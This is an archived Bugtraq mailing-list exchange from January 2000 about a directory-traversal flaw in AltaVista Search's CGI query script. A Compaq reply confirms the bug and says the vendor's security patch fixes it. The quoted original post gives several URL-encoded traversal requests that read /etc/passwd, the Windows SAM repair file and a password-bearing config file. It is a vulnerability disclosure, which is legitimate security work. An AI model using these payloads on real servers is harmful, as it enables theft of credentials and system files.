Hi Rudi,
Just tried to reproduce the bugs you were talking about, and I can
confirm that they exist without their secpatch and that they are gone
after having installed the secpatch.
Guy ROELANDTS
Compaq EMEA
> -----Original Message-----
> From: rudi carell [mailto:rudicarell_at_HOTMAIL.COM]
> Sent: Sunday, January 09, 2000 4:37 PM
> To: BUGTRAQ_at_SECURITYFOCUS.COM
> Subject: Altavista followup
>
>
> hola,
>
> more bugs in the AV-Search thing ..
>
> using uri-encoded strings it is possible to view "any" file
> on the system ..
>
> examples:
>
> unixxxsss ...
>
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/
etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r
epair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde
xer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli
cy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays:-/
RC
rudicarell_at_hotmail.com
Received on Jan 11 2000
Intro
